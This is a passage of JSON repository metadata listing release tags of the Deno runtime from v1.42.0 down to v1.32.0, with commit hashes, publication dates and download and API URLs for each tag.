o/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ec